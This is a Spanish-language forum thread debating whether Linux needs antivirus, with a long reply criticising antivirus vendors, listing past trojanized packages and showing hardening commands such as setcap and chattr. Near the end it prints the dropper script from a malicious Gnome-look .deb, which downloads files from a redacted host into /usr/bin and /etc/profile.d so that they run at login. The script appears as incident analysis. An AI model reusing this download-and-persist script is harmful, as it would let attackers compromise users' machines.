Avg antivirus para linux para varias dsitribuciones
- Iniciador del tema anec
- Fecha de inicio
![-=[яєgєηєѕιѕ]=-](/foro/data/avatars/m/713/713087.jpg?1424577262){kind=avatar}
Con todo respeto a quienes han respondido antes.
Todo sistema operativo es suceptible de virus, y GNU/Linux también lo es. Soy L.I. y aunque escasos son los casos de afectaciones por virus en un GNU/Linux, mi experiencia me ha dicho que si es posible.
Miren, tan sencillo como que yo hago un script para borrar carpetas, lo oculto como alguna cosa "interesante" para los fanboys y listo, ya tienen lo que podrian llamar virus en su S.O..
Ojalá no tomen a la segura esto de la seguridad.
Y quienes sigan diciendo que no hay virus para linux, deberían leer un poco antes de decir tales aberraciones que no aportan nada, sino que por el contrario destruyen la libertad de saber la verdad.
Les dejo un árticulo de un ejecutivo de ESET (la empresa que desarrolla NOD32) en España, supongo que es alguien que sabe del tema de los virus. Espero se den el tiempo de leerlo, aclaro no me gusta el antivirus de ESET la revista en la que esta el árticulo la leo ocasionalmente, no me pagan por hacerle publicidad ni mucho menos.
Linux y la seguridad digital se llama el árticulo
Publicado en la revista Linux+ del mes de marzo de 2010
por Fernando de la Cuadra, director de educación y distribuidor de soluciones de seguridad.
Descarga la revista para leer el árticulo aquí:
http://lpmagazine.org/es/magazine/1019-airbase-y-karmetasploit-3-2010-62
Un saludos
Todo sistema operativo es suceptible de virus, y GNU/Linux también lo es. Soy L.I. y aunque escasos son los casos de afectaciones por virus en un GNU/Linux, mi experiencia me ha dicho que si es posible.
Miren, tan sencillo como que yo hago un script para borrar carpetas, lo oculto como alguna cosa "interesante" para los fanboys y listo, ya tienen lo que podrian llamar virus en su S.O..
Ojalá no tomen a la segura esto de la seguridad.
Y quienes sigan diciendo que no hay virus para linux, deberían leer un poco antes de decir tales aberraciones que no aportan nada, sino que por el contrario destruyen la libertad de saber la verdad.
Les dejo un árticulo de un ejecutivo de ESET (la empresa que desarrolla NOD32) en España, supongo que es alguien que sabe del tema de los virus. Espero se den el tiempo de leerlo, aclaro no me gusta el antivirus de ESET la revista en la que esta el árticulo la leo ocasionalmente, no me pagan por hacerle publicidad ni mucho menos.
Linux y la seguridad digital se llama el árticulo
Publicado en la revista Linux+ del mes de marzo de 2010
por Fernando de la Cuadra, director de educación y distribuidor de soluciones de seguridad.
Descarga la revista para leer el árticulo aquí:
http://lpmagazine.org/es/magazine/1019-airbase-y-karmetasploit-3-2010-62
Un saludos
Claro que un ejecutivo de una compañía que vende antivirus te lo va a decir, ya que llevan años intentando vender sus productos para el escritorio GNU/Linux. También lo leí ese artículo pero hay que leerlo con reservas. Y si lees sus artículos anteriores también te darás cuenta de que intenta vender su idea de un Linux total e irremediablemente vulnerable hasta para el vuelo de una mosca, pero que con sus soluciones antivirus se arregla.
Si fuera así de fácil crear un script escondido para los fanboys (esta palabra de me hace que la usan para denigrar) habría miles de ellos y no es un virus ya que necesita de la ayuda del usuario. No hay que creer fielmente en que los usuarios de GNU/Linux no se toman la seguridad enserio y de lo fácil que es el infectar a millones de "fanboys".
http://linuxmafia.com/~rick/faq/index.php?page=virus
21/Enero/1999 TCP Wrappers fue troyanizado, pero los distribuidores de Linux se dieron cuenta por las firmas PGP
22/Enero/1999 util-linux (versión de desarrollo) le ocurrió lo mismo.
2002 - OpenSSH y SendMail
2007 - SquirrelMail
Enero 2001 Borland/Inprise's SQL database (Interbase) incluyó un backdoor
Febrero 2003 El mantenedor de mICQ introdujo código obfuscado en su propio programa, ocasionando que lo rechazaran en Debian.
Las empresas de Antivirus afirman que el tener instalado Linux crea una falsa sensación de seguridad, pero también es aplicable a sus productos, pero la principal diferencia es que ellos si te lo venden($$$$) con la idea de que al tener un antivirus instalado vas a estar protegido creando una cultura de descuido y de una sensación falsa de seguridad, llevan años predicando la erradicación y la protección total ante el malware en Windows, dependiendo de lo que pagues es la protección tal y como la mafia lo hace, te infunden miedo y después te cobran la cuota correspondiente para asegurarte la protección. Pero no se quedan ahí, también llevan años prediciendo la inminente plaga para Linux y otras plataformas.
http://simson.net/clips/2000/2000.SecurityFocus.Linux_Viruses.html
Simson L. Garfinke "Linux desperately needs credible anti-virus software to stave off the coming epidemic"
Y yo sigo esperando, ya hasta se parecen a las profecías del fin del mundo, que en el 2000, 2012, y probablemente intermedias. Las casas de antivirus proponen un futuro donde:
1.- El malware avanzan
2.- Los antivirus avanzan
3.- Los usuarios siguen igual
Segun http://www.viruslist.com/sp/analysis?pubid=207271033
Linux 1898
Backdoors, Hacktools, Exploits & Rootkits 942 (50%)
Virus y Gusanos 136 (7%)
Troyanos 88 (5%)
Hay qu recordar que los hacktools también son programas para escanear puertos, analizar y capturar tráfico, para obtener contraseñas, etc., como lo son nmap, dsniffer, john, yaph, aircrack, tcpdump, nc y muchos muchos mas.
¿Cuantos de esos 1898 tienen vigencia?
En el caso de los ataques dirigidos a los sistemas de la familia Unix, el objetivo es permanecer desapercibido para obtener detalles de tarjetas de crédito (mediante las tiendas online) o las contraseñas de los usuarios. En su mayoría, los ataques no se realizan mediante troyanos, sino vulnerando conocidas fallas de seguridad en servidores.
http://doc.ubuntu-es.org/LinuxVirus
http://www.iberprensa.com/todolinux/articulos/TL89_reporvirus.pdf
http://linuxadictos.com/2008/10/27/kaspersky-dice-que-linux-tendra-virus-nosotros-temblamos/
http://en.wikipedia.org/wiki/List_of_Linux_computer_viruses
http://blog.linuxtoday.com/blog/2009/07/linux-doomed-to.html
"Not only that, but Linux permeates every possible segment of tech-- routers and networking devices, home and business automation, security and surveillance systems, phones, netbooks and other consumer mobile devices, desktops, vehicles, media servers and settop boxes; it's already a major player in the datacenter, server room, mainframes, clusters, and supercomputing. Linux runs on multiple CPU architectures. So a Windows-type Trojan horse or worm on Linux should have a much more catastrophic effect because of Linux' much greater reach."
http://boycottnovell.com/2009/07/31/sightings-of-security-fud/
http://www.viruslist.com/sp/analysis?pubid=197329957
¿Masa crítica? Porque no ponen cual es la masa crítica, se supone que son los expertos, y segun sus avanzados analisis tienen que tener una gráfica en donde se proyecte la tendencia, y así poder determinar cual es esa masa crítica. O tal vez lo que quisieron decir es que la cantidad de ataques va a aumentar cuando la "Masa Critica", es decir, cuando ya no estan agusto con el producto
. (No es lo mismo "Lamentamos la pérdida de tu hermana" que "Lamentamos la perdida de tu hermana")
Como no se les ha cumplido su predicción, mas FUD, segun ellos "en esencia nada es más seguro que Windows (por lo tanto compre nuestros productos)", jejejeje. Que $orprendente y M($)agnanimo anali$i$, que me ha hecho refelexionar el usar únicamente soluciones MS+Kaspersky.
http://enciclopediavirus.com/virus/vervirus.php?id=212&alerta=1
1996 2002 http://www.mercedesya.com.ar/noticias/30002098-microsoft-distribuye-un-virus-por-accidente.htm
La compañía informática Microsoft envió accidentalmente el gusano Nimda a desarrolladores de Corea del Sur cuando distribuía en su web las versiones en coreano de Visual Studio .Net infectadas con el virus.
http://anime0.spaces.live.com/Blog/cns!A247971349BD0143!1455.entry
http://www.fentlinux.com/web/?q=node/1590
http://www.kriptus.com/apple-reconoce-haber-distribuido-ipods-con-virus/
http://www.gacetadigital.com/nuevos-fallos-de-seguridad-en-cds-musicales-distribuidos-por-sony/
Al menos se que los encargados de las distribuciones se esfuerzan en evitar que sucedan este tipo de cosas.
Y eso sin poner la heuristica, bloqueo de archivos encriptados y ni que se ponga a detectar binarios corruptos. Y son por lo general exploits para servicios de red, troyanos y rootkits, pero ya no son válidos en la actualidad y en su momento necesitaron que el atacante los introdujera a través de un exploit, compilara, etc. etc.
Los troyanos, rootkits y compañía, para Linux/Unix siempre han existido y existirán, pero por lo general explotan vulnerabilidades viejas o conocidas y/o servicios mal configurados, muy pocos hacen uso de vulnerabilidades desconocidas, además de quedar obsoletos muy rápido y de existir una amplia gama de soluciones OpenSources.
Realmente la seguridad por defecto con la que vienen muchas distribuciones (la mayoría) de Linux es muy relajada, y realmente por ahora no se necesista más que el sentido común (en ningún momento se esta diciendo que no se preocupan por la seguridad y no trabajan sobre ello para mejorarla), y como usuarios no necesitamos desembolsar ni un solo peso, ni instalar programas inecesarios, y eso es lo que les pesa a la industria de los antivirus y más a los que afirman que la seguridad en Linux viene dada por la poca cantidad de usuarios y que por lo tanto no resulta rentable ponerse a hacer virus, pero realmente no toman en cuenta los millones de servidores que dan la cara a internet y que son los que se encuentran bajo ataque constante, a mi parecer es mas jugoso tomar el control de uno de estos servidores, manejan miles de cuentas, password y en ocasiones información confidencial, como los emails que se volaron de lo del Cambio Climático (Climategate), que hasta el director de una prestigiada institución en Londres tuvo que dimitir (P
los tengo todos, pero me de una h***a leerlos todos).
Pueden hacer una pequeña prueba, instalen apache, cherokee o el servidor web que quieran, ponganlo a escuhar por el puerto 3128 o el 8080 y en poco tiempo verán en los logs pruebas para ver si tienes un proxy el cual puedan usar. Al igual que si ven los logs de su router verán constantes escaneos a puertos que son conocidos como inseguros.
No se porque la idea general que impera es que los usuarios de Linux no se preocupan o toman enserio la seguridad. En el caso de Ubuntu se puede ver lo que estan haciendo en:
https://wiki.ubuntu.com/Security/Features
Y eso que todavía no se estan usando las Linux Capabilities para reducir el uso del setuid. El clásico ejemplo esta en el uso del ping
Tiene habilitado el bit suid
Ahora le quitamos el bit suid y tratamos de hacer ping
Ahora
Es un error creer en el root todo poderoso, el kernel lo ve como a un usuario más, sólo que le da ciertas capacidades administrativas y que, en determinado momento se le pueden quitar.
Por ejemplo si uno esta muy paranóico, ciertos archivos los podemos hacer inmutables con sudo chattr +i archivo y enseguida le quitamos a root la capacidad de manipular estas banderas (lpcap 9) y por más que alguien se haga root no podrá modificar ni troyanizar los archivos y/o ejecutables que marcamos como inmutables y en el caso de usar la bandera a (se puede añadir mas no borrar) especificos para los logs, no van a poder borrar esos logs (evidencia de su acceso).
¿Cuanto tiempo se tardo la comunidad en detectar y eliminar esta "amenaza"?
8 Dic subieron el deb a Gnome-look
En poco tiempo algún usuario que lo instaló se dió cuenta que existía algo raro
A las pocas horas ya se tenía la solución para los que lo instalaron y además un programa para detectar si todavía estaba el script en funcionamiento (por aquello de las dudas)
Para el 9 de Diciembre, ya no existía el deb en gnome-look, ni la página del "atacante"
¿Alguna empresa de antivirus fue la que lo detectó? No, fueron los mismos usuarios. Sólo después, estas empresas (ESET) se subieron al carro, con el fin de a ver que agarraban y como siempre, infundir miedo.
Si te sientes molesto de que tengas tu linux con virus y que se los pases a tus compas instalate clamav, y si vez que un virus no te lo detecta con facilidad lo puedes agregar a la lista de firmas de virus.
Conclusión: Cuando un SO se populariza lo que crece es la morbosidad por la noticia (genera más ingresos), y la necesidad imperiosa de vender por parte de las empresas, el negocio es negocio. Y lo peor es que hacen creer que entre más recursos coma el Antivirus y más lenta se haga la PC vas a tener una excelente protección. (2005 Anti-virus File Systen - Avfs esta incluido en ubuntu para instalarlo, no consume recursos y se integra al sistema de archivos)
P Este es el código
Así es como se instala un rootkit en Linux
http://foro.xxxxxxxxxxxx/index.php?topic=xxxxxxx
Y así es como se pasa la seguridad de un antivirus:
http://XXXXXXXXXXXXXXXXXXXXXX/2009/01/eye-XXXXXXXXXXXX.html
http://XXXXXXXXXX.com.ar/Foro/index.php?topic=XXXXXXXXX
La solución a la mayoría de los problemas de seguridad es educar al usuario en el uso del sentido común (es el mejor antivirus y anti-malware).
Si fuera así de fácil crear un script escondido para los fanboys (esta palabra de me hace que la usan para denigrar) habría miles de ellos y no es un virus ya que necesita de la ayuda del usuario. No hay que creer fielmente en que los usuarios de GNU/Linux no se toman la seguridad enserio y de lo fácil que es el infectar a millones de "fanboys".
http://linuxmafia.com/~rick/faq/index.php?page=virus
21/Enero/1999 TCP Wrappers fue troyanizado, pero los distribuidores de Linux se dieron cuenta por las firmas PGP
22/Enero/1999 util-linux (versión de desarrollo) le ocurrió lo mismo.
2002 - OpenSSH y SendMail
2007 - SquirrelMail
Enero 2001 Borland/Inprise's SQL database (Interbase) incluyó un backdoor
Febrero 2003 El mantenedor de mICQ introdujo código obfuscado en su propio programa, ocasionando que lo rechazaran en Debian.
Las empresas de Antivirus afirman que el tener instalado Linux crea una falsa sensación de seguridad, pero también es aplicable a sus productos, pero la principal diferencia es que ellos si te lo venden($$$$) con la idea de que al tener un antivirus instalado vas a estar protegido creando una cultura de descuido y de una sensación falsa de seguridad, llevan años predicando la erradicación y la protección total ante el malware en Windows, dependiendo de lo que pagues es la protección tal y como la mafia lo hace, te infunden miedo y después te cobran la cuota correspondiente para asegurarte la protección. Pero no se quedan ahí, también llevan años prediciendo la inminente plaga para Linux y otras plataformas.
http://simson.net/clips/2000/2000.SecurityFocus.Linux_Viruses.html
Simson L. Garfinke "Linux desperately needs credible anti-virus software to stave off the coming epidemic"
Y yo sigo esperando, ya hasta se parecen a las profecías del fin del mundo, que en el 2000, 2012, y probablemente intermedias. Las casas de antivirus proponen un futuro donde:
1.- El malware avanzan
2.- Los antivirus avanzan
3.- Los usuarios siguen igual
Segun http://www.viruslist.com/sp/analysis?pubid=207271033
Linux 1898
Backdoors, Hacktools, Exploits & Rootkits 942 (50%)
Virus y Gusanos 136 (7%)
Troyanos 88 (5%)
Hay qu recordar que los hacktools también son programas para escanear puertos, analizar y capturar tráfico, para obtener contraseñas, etc., como lo son nmap, dsniffer, john, yaph, aircrack, tcpdump, nc y muchos muchos mas.
¿Cuantos de esos 1898 tienen vigencia?
En el caso de los ataques dirigidos a los sistemas de la familia Unix, el objetivo es permanecer desapercibido para obtener detalles de tarjetas de crédito (mediante las tiendas online) o las contraseñas de los usuarios. En su mayoría, los ataques no se realizan mediante troyanos, sino vulnerando conocidas fallas de seguridad en servidores.
http://doc.ubuntu-es.org/LinuxVirus
http://www.iberprensa.com/todolinux/articulos/TL89_reporvirus.pdf
http://linuxadictos.com/2008/10/27/kaspersky-dice-que-linux-tendra-virus-nosotros-temblamos/
http://en.wikipedia.org/wiki/List_of_Linux_computer_viruses
http://blog.linuxtoday.com/blog/2009/07/linux-doomed-to.html
"Not only that, but Linux permeates every possible segment of tech-- routers and networking devices, home and business automation, security and surveillance systems, phones, netbooks and other consumer mobile devices, desktops, vehicles, media servers and settop boxes; it's already a major player in the datacenter, server room, mainframes, clusters, and supercomputing. Linux runs on multiple CPU architectures. So a Windows-type Trojan horse or worm on Linux should have a much more catastrophic effect because of Linux' much greater reach."
http://boycottnovell.com/2009/07/31/sightings-of-security-fud/
http://www.viruslist.com/sp/analysis?pubid=197329957
¿Masa crítica? Porque no ponen cual es la masa crítica, se supone que son los expertos, y segun sus avanzados analisis tienen que tener una gráfica en donde se proyecte la tendencia, y así poder determinar cual es esa masa crítica. O tal vez lo que quisieron decir es que la cantidad de ataques va a aumentar cuando la "Masa Critica", es decir, cuando ya no estan agusto con el producto
. (No es lo mismo "Lamentamos la pérdida de tu hermana" que "Lamentamos la perdida de tu hermana")Como no se les ha cumplido su predicción, mas FUD, segun ellos "en esencia nada es más seguro que Windows (por lo tanto compre nuestros productos)", jejejeje. Que $orprendente y M($)agnanimo anali$i$, que me ha hecho refelexionar el usar únicamente soluciones MS+Kaspersky.
http://enciclopediavirus.com/virus/vervirus.php?id=212&alerta=1
1996 2002 http://www.mercedesya.com.ar/noticias/30002098-microsoft-distribuye-un-virus-por-accidente.htm
La compañía informática Microsoft envió accidentalmente el gusano Nimda a desarrolladores de Corea del Sur cuando distribuía en su web las versiones en coreano de Visual Studio .Net infectadas con el virus.
http://anime0.spaces.live.com/Blog/cns!A247971349BD0143!1455.entry
http://www.fentlinux.com/web/?q=node/1590
http://www.kriptus.com/apple-reconoce-haber-distribuido-ipods-con-virus/
http://www.gacetadigital.com/nuevos-fallos-de-seguridad-en-cds-musicales-distribuidos-por-sony/
Al menos se que los encargados de las distribuciones se esfuerzan en evitar que sucedan este tipo de cosas.
Código:
clamscan -i
/home/enelm/Escritorio/XXXXXXXXXXXXXXXXX.zip: LINUX.Vit.4096 FOUND
/home/enelm/Escritorio/XXXXXXXXXXXXXXXXX.zip: Linux.Sickabs.15488 FOUND
/home/enelm/Escritorio/XXXXXXXXXXXXXXXXX.zip: VX.Virus.Linux.Spork.4096-SecuriteInfo.com.UNOFFICIAL FOUND
/home/enelm/Escritorio/XXXXXXXXXXXXXXXXX.zip: VX.Backdoor.Linux.Blackhole-SecuriteInfo.com.UNOFFICIAL FOUND
/home/enelm/Escritorio/XXXXXXXXXXXXXXXXX.zip: Exploit.Bind-1 FOUND
/home/enelm/Escritorio/XXXXXXXXXXXXXXXXX.zip: Linux.Neox.A FOUND
/home/enelm/Escritorio/XXXXXXXXXXXXXXXXX.zip: Exploit.Bind-2 FOUND
/home/enelm/Escritorio/XXXXXXXXXXXXXXXXX.134.zip: Exploit.Apache FOUND
----------- SCAN SUMMARY -----------
Known viruses: 991555
Engine version: 0.95.3
Scanned directories: 1
Scanned files: 36
Infected files: 8Los troyanos, rootkits y compañía, para Linux/Unix siempre han existido y existirán, pero por lo general explotan vulnerabilidades viejas o conocidas y/o servicios mal configurados, muy pocos hacen uso de vulnerabilidades desconocidas, además de quedar obsoletos muy rápido y de existir una amplia gama de soluciones OpenSources.
Realmente la seguridad por defecto con la que vienen muchas distribuciones (la mayoría) de Linux es muy relajada, y realmente por ahora no se necesista más que el sentido común (en ningún momento se esta diciendo que no se preocupan por la seguridad y no trabajan sobre ello para mejorarla), y como usuarios no necesitamos desembolsar ni un solo peso, ni instalar programas inecesarios, y eso es lo que les pesa a la industria de los antivirus y más a los que afirman que la seguridad en Linux viene dada por la poca cantidad de usuarios y que por lo tanto no resulta rentable ponerse a hacer virus, pero realmente no toman en cuenta los millones de servidores que dan la cara a internet y que son los que se encuentran bajo ataque constante, a mi parecer es mas jugoso tomar el control de uno de estos servidores, manejan miles de cuentas, password y en ocasiones información confidencial, como los emails que se volaron de lo del Cambio Climático (Climategate), que hasta el director de una prestigiada institución en Londres tuvo que dimitir (P
los tengo todos, pero me de una h***a leerlos todos).Pueden hacer una pequeña prueba, instalen apache, cherokee o el servidor web que quieran, ponganlo a escuhar por el puerto 3128 o el 8080 y en poco tiempo verán en los logs pruebas para ver si tienes un proxy el cual puedan usar. Al igual que si ven los logs de su router verán constantes escaneos a puertos que son conocidos como inseguros.
No se porque la idea general que impera es que los usuarios de Linux no se preocupan o toman enserio la seguridad. En el caso de Ubuntu se puede ver lo que estan haciendo en:
https://wiki.ubuntu.com/Security/Features
Y eso que todavía no se estan usando las Linux Capabilities para reducir el uso del setuid. El clásico ejemplo esta en el uso del ping
Código:
$ ls -lh /bin/ping
-rwsr-xr-x 1 root root
Código:
$ ping www.google.com
PING www.l.google.com (66.102.7.99) 56(84) bytes of data.
64 bytes from lax04s01-in-f99.1e100.net (66.102.7.99): icmp_seq=1 ttl=52 time=115 ms
64 bytes from lax04s01-in-f99.1e100.net (66.102.7.99): icmp_seq=2 ttl=52 time=122 ms
64 bytes from lax04s01-in-f99.1e100.net (66.102.7.99): icmp_seq=3 ttl=52 time=110 ms
^C
--- www.l.google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 110.242/116.072/122.060/4.825 ms
Código:
$ sudo chmod u-s /bin/ping
$ ping www.google.com
ping: icmp open socket: Operation not permitted
$ ls -lh /bin/ping
-rwxr-xr-x 1 root root
Código:
$ sudo setcap cap_net_raw=ep /bin/ping
$ ping www.google.com
PING www.l.google.com (66.102.7.99) 56(84) bytes of data.
64 bytes from lax04s01-in-f99.1e100.net (66.102.7.99): icmp_seq=1 ttl=52 time=127 ms
64 bytes from lax04s01-in-f99.1e100.net (66.102.7.99): icmp_seq=2 ttl=52 time=119 ms
64 bytes from lax04s01-in-f99.1e100.net (66.102.7.99): icmp_seq=3 ttl=52 time=112 ms
^C
--- www.l.google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 112.093/119.837/127.543/6.307 msPor ejemplo si uno esta muy paranóico, ciertos archivos los podemos hacer inmutables con sudo chattr +i archivo y enseguida le quitamos a root la capacidad de manipular estas banderas (lpcap 9) y por más que alguien se haga root no podrá modificar ni troyanizar los archivos y/o ejecutables que marcamos como inmutables y en el caso de usar la bandera a (se puede añadir mas no borrar) especificos para los logs, no van a poder borrar esos logs (evidencia de su acceso).
¿Cuanto tiempo se tardo la comunidad en detectar y eliminar esta "amenaza"?
8 Dic subieron el deb a Gnome-look
En poco tiempo algún usuario que lo instaló se dió cuenta que existía algo raro
A las pocas horas ya se tenía la solución para los que lo instalaron y además un programa para detectar si todavía estaba el script en funcionamiento (por aquello de las dudas)
Para el 9 de Diciembre, ya no existía el deb en gnome-look, ni la página del "atacante"
¿Alguna empresa de antivirus fue la que lo detectó? No, fueron los mismos usuarios. Sólo después, estas empresas (ESET) se subieron al carro, con el fin de a ver que agarraban y como siempre, infundir miedo.
Si te sientes molesto de que tengas tu linux con virus y que se los pases a tus compas instalate clamav, y si vez que un virus no te lo detecta con facilidad lo puedes agregar a la lista de firmas de virus.
Conclusión: Cuando un SO se populariza lo que crece es la morbosidad por la noticia (genera más ingresos), y la necesidad imperiosa de vender por parte de las empresas, el negocio es negocio. Y lo peor es que hacen creer que entre más recursos coma el Antivirus y más lenta se haga la PC vas a tener una excelente protección. (2005 Anti-virus File Systen - Avfs esta incluido en ubuntu para instalarlo, no consume recursos y se integra al sistema de archivos)
P
Este es el código
Código:
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://xxxxxxxxxxx.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://xxxxxxxxxxxxxxx.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exithttp://foro.xxxxxxxxxxxx/index.php?topic=xxxxxxx
Y así es como se pasa la seguridad de un antivirus:
http://XXXXXXXXXXXXXXXXXXXXXX/2009/01/eye-XXXXXXXXXXXX.html
http://XXXXXXXXXX.com.ar/Foro/index.php?topic=XXXXXXXXX
La solución a la mayoría de los problemas de seguridad es educar al usuario en el uso del sentido común (es el mejor antivirus y anti-malware).
